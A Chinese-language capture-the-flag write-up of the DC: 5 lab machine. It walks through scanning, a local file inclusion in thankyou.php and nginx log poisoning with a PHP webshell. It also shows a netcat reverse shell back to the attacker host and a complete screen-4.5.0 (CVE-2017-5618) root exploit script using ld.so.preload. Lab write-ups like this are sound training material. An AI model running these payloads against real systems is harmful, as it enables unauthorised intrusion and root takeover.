DC 系列的第五題,該題 DC: 5 也是目前為止花費最多時間的一題,過程中也更為基礎加固、更扎實些,資安的學習也真的是需要不斷的經驗累積,涉及廣闊,不大可能樣樣精通,只有大量累積經驗、吸收關鍵字、刺激思維,才能夠因應各種環境逐一挖掘弱點。
目錄
環境設定
VirtualBox: Kali & DC: 5
Net Config: NAT Network
尋找靶機
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | $ nmap 10.0.2.1/24 -sP Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-02 17:49 CSTNmap scan report for 10.0.2.1Host is up (0.0049s latency).Nmap scan report for 10.0.2.2Host is up (0.0088s latency).Nmap scan report for 10.0.2.11Host is up (0.0013s latency).Nmap scan report for 10.0.2.15Host is up (0.00040s latency).Nmap done: 256 IP addresses (4 hosts up) scanned in 2.56 seconds$ nmap 10.0.2.11 -p- -AStarting Nmap 7.91 ( https://nmap.org ) at 2021-02-02 17:49 CSTNmap scan report for 10.0.2.11Host is up (0.0024s latency).Not shown: 65532 closed portsPORT STATE SERVICE VERSION80/tcp open http nginx 1.6.2|_http-server-header: nginx/1.6.2|_http-title: Welcome111/tcp open rpcbind 2-4 (RPC #100000)| rpcinfo: | program version port/proto service| 100000 2,3,4 111/tcp rpcbind| 100000 2,3,4 111/udp rpcbind| 100000 3,4 111/tcp6 rpcbind| 100000 3,4 111/udp6 rpcbind| 100024 1 38053/tcp status| 100024 1 52396/tcp6 status| 100024 1 57321/udp6 status|_ 100024 1 58274/udp status38053/tcp open status 1 (RPC #100024) |
解題過程
Wappalyzer
首先瀏覽 Port 80 感覺上是一個簡易的 CMS 服務,透過 Wappalyzer 沒有什麼發現。
目錄爆破
緊接著透過 drisearch 進行目錄爆破,同樣沒有什麼發現。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | $ python3 dirsearch.py -u http://10.0.2.11/ -w db/all.txt -e php _|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| ) Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 86760Error Log: /home/mksyi/下載/dirsearch/logs/errors-21-02-03_10-24-34.logTarget: http://10.0.2.11/ Output File: /home/mksyi/下載/dirsearch/reports/10.0.2.11/_21-02-03_10-24-34.txt[10:24:34] Starting: [10:24:41] 301 - 184B - /images/ [10:24:48] 403 - 570B - /css/[10:24:58] 200 - 4KB - /solutions.php[10:25:13] 200 - 4KB - /index.php[10:25:33] 200 - 852B - /thankyou.php[10:25:40] 200 - 6KB - /faq.php[10:26:26] 200 - 17B - /footer.php[10:26:33] 200 - 4KB - /contact.php Task Completed |
LFI
經過一系列的探勘,有功能的部分僅有 contact.php 與 thankyou.php 兩個頁面,其中有想過,會不會是透過 contact.php 聯繫站長,並藉機 XSS 攻擊,但 submit 後,頁面僅僅使用 GET 轉跳到 thankyou.php 頁面,甚至我還裝 Beef 工具進行嘗試,顯然沒有任何進展。
之後在 thankyou.php 頁面發現底部的月份會隨著重新整理不斷變化。
第一時間看到 footer 的變化,僅覺得可能是 Load Balance 機制,並沒有其他想法,但隨著時間拉長,皆沒有新的發現與突破,心想不會這麼通靈吧…,直到用了 fuzz 把 thankyou.php 的參數名稱爆了一輪,發現 /thankyou.php?file 的結果與其他不同。
- –hh 851: 隱藏條件 Chars 字數為 851 的項目
由於名稱為 file 的直覺,直接使用 /etc/passwd 來嘗試,結果真的把檔案讀出來了,於是挖掘出一個 LFI(Local File inclusion) 弱點。
透過 PHP 偽協議取得 thankyou.php 的原始碼,其中比較關鍵的程式碼如下。
1 2 3 4 5 6 7 8 9 10 11 | <?php $file = $_GET['file']; if(isset($file)) { include("$file"); } else { include("footer.php"); }?> |
Get Shell
透過 LFI 探看發現 nginx 的設定檔位置為 /etc/nginx/nginx.conf,獲得 Logs 的存放位置為 /var/log/nginx/{access|error}.log,可以藉由 log 紀錄進行寫入,藉此把 PHP Code 寫到 log 中,再藉由 LFI 讀取 Log 檔,由於 include 會針對 <?php ?> 標籤內的內容進行解析,藉此來完成「寫檔」、「讀檔」、「執行」。
預設的 nginx 設定擋路徑參考:How to Configure NGINX
上傳 Shell
首先可以決定要產生「正常」或「錯誤」的 Log,以正常的 Log 為例,雖然回應 404,但非伺服器端錯誤(500),所以 Log 會寫至 access.log 中。
1 | http://10.0.2.11/AAA<?php echo system($_POST['cmd']); ?> |
這邊踩了一個坑,由於太習慣用 Hackbar 送 Payload,導致送出的 Payload 被瀏覽器做一層 URLencode,然後也不知道怎麼誤打誤撞的成功過一次,之後就執著於此,要再次復現就困難重重,並不斷迴圈,甚至還重佈了幾次靶機,最後同事說用 Burp 送,Burp 丟出來的東西是最原始的,然後就成功把 Webshell 寫進 Log 了。
取得 Shell
Listen
1 | nc -nl -vv -p 8888 |
Victim
1 | nc -e /bin/sh 10.0.2.15 8888 |
1 | python -c "import pty;pty.spawn('/bin/bash')" |
提權
Linux exploit sugester
透過 linux-exploit-suggester 快速分析出可能存在的 Exploit。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 | www-data@dc-5:/tmp$ chmod +x linux-exploit-suggester.shchmod +x linux-exploit-suggester.shwww-data@dc-5:/tmp$ ./linux-exploit-suggester.sh./linux-exploit-suggester.shAvailable information:Kernel version: 3.16.0Architecture: x86_64Distribution: debianDistribution version: 8Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performedPackage listing: from current OSSearching among:74 kernel space exploits46 user space exploitsPossible Exploits:[+] [CVE-2016-5195] dirtycow Exposure: highly probable Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04 Download URL: https://www.exploit-db.com/download/40611 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[+] [CVE-2016-5195] dirtycow 2 Exposure: highly probable Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Download URL: https://www.exploit-db.com/download/40839 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[+] [CVE-2016-1247] nginxed-root.sh Exposure: probable Tags: [ debian=8 ],ubuntu=14.04|16.04|16.10 Comments: Rooting depends on cron.daily (up to 24h of delay). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0; gentoo: <1.10.2-r3[+] [CVE-2017-6074] dccp Exposure: less probable Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} Download URL: https://www.exploit-db.com/download/41458 Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64 Exposure: less probable Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611 Comments: Uses "Stack Clash" technique, works against most SUID-root binaries[+] [CVE-2017-1000253] PIE_stack_corruption Exposure: less probable Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}[+] [CVE-2016-2384] usb-midi Exposure: less probable Tags: ubuntu=14.04,fedora=22 Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user[+] [CVE-2015-9322] BadIRET Exposure: less probable Tags: RHEL<=7,fedora=20 Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz[+] [CVE-2015-8660] overlayfs (ovl_setattr) Exposure: less probable Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic} Download URL: https://www.exploit-db.com/download/39166[+] [CVE-2015-8660] overlayfs (ovl_setattr) Exposure: less probable Download URL: https://www.exploit-db.com/download/39230[+] [CVE-2015-3290] espfix64_NMI Exposure: less probable Download URL: https://www.exploit-db.com/download/37722[+] [CVE-2015-1328] overlayfs Exposure: less probable Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic} Download URL: https://www.exploit-db.com/download/37292[+] [CVE-2014-5207] fuse_suid Exposure: less probable Download URL: https://www.exploit-db.com/download/34923[+] [CVE-2016-0728] keyring Exposure: less probable Download URL: https://www.exploit-db.com/download/40003 Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working |
SUID check
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | www-data@dc-5:/tmp$ find / -user root -perm -4000 -print 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null/bin/su/bin/mount/bin/umount/bin/screen-4.5.0/usr/bin/gpasswd/usr/bin/procmail/usr/bin/passwd/usr/bin/chfn/usr/bin/newgrp/usr/bin/chsh/usr/lib/openssh/ssh-keysign/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/eject/dmcrypt-get-device/usr/sbin/exim4/sbin/mount.nfs |
Get Root
透過以上資訊蒐集得到系統上可能存在 dirtycow 漏洞,但經過嘗試無法成功編譯,於是看到 SUID 的部分含有一支可疑的程式 screen-4.5.0,於是找到了 CVE-2017-5618 弱點,但發現他的 PoC 好像末端都藏有一個隱藏字元,若沒清掉無法直接使用,還好只是小小的 sh 檔,複製貼上拆出來跑就行。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | cat << EOF > /tmp/libhax.c#include <stdio.h>#include <sys/types.h>#include <unistd.h>__attribute__ ((__constructor__))void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n");}EOFgcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.crm -f /tmp/libhax.ccat << EOF > /tmp/rootshell.c#include <stdio.h>int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL);}EOFgcc -o /tmp/rootshell /tmp/rootshell.crm -f /tmp/rootshell.ccd /etcumask 000 # becausescreen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"screen -ls/tmp/rootshell# whoamiroot |
cc1 導致無法編譯問題
這邊感謝同事支援,在 Reverse shell 底下,若要直接使用 gcc 進行編譯,則會噴出找不到 cc1 的問題,為了解決這個問題使用 export PATH=$PATH 指令來搞定,據同事大大的分析與猜測指出,該址指令是把「環境變數」寫到「區域變數」,至於在執行前輸入 $PATH 是含有 gcc 資訊的,至於為什麼需要手動重新賦值,主要原因可能是因為在 Reverse shell 下導致 Shell 在 Fork 時,區域變數沒有被賦值。
1 2 | $ gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.cgcc: error trying to exec 'cc1': execvp: No such file or directory |
感恩 Z大 讚嘆 Z大
Flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | # cat /root/thisistheflag.txt888b 888 d8b 888 888 888 888 8888b 888 Y8P 888 888 888 888 88888b 888 888 888 888 888 888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888 888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888 888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P 888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " " 888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888 Once again, a big thanks to all those who do these little challenges,and especially all those who give me feedback - again, it's all greatlyappreciated. :-)I also want to send a big thanks to all those who find the vulnerabilitiesand create the exploits that make these challenges possible. |
